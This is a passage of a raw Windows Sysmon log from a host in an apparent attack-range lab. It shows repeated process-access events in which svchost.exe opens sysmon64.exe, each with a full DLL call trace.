15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001411Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001410Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001409Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001408Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001407Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001406Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001405Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001404Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001403Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001402Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001401Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.925{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001400Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.925{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001399Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.925{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001398Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.925{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001397Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.925{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001396Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.925{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001395Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.925{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001394Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.925{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001393Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.925{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001392Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.925{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001391Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.925{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001390Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.925{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001389Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001388Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84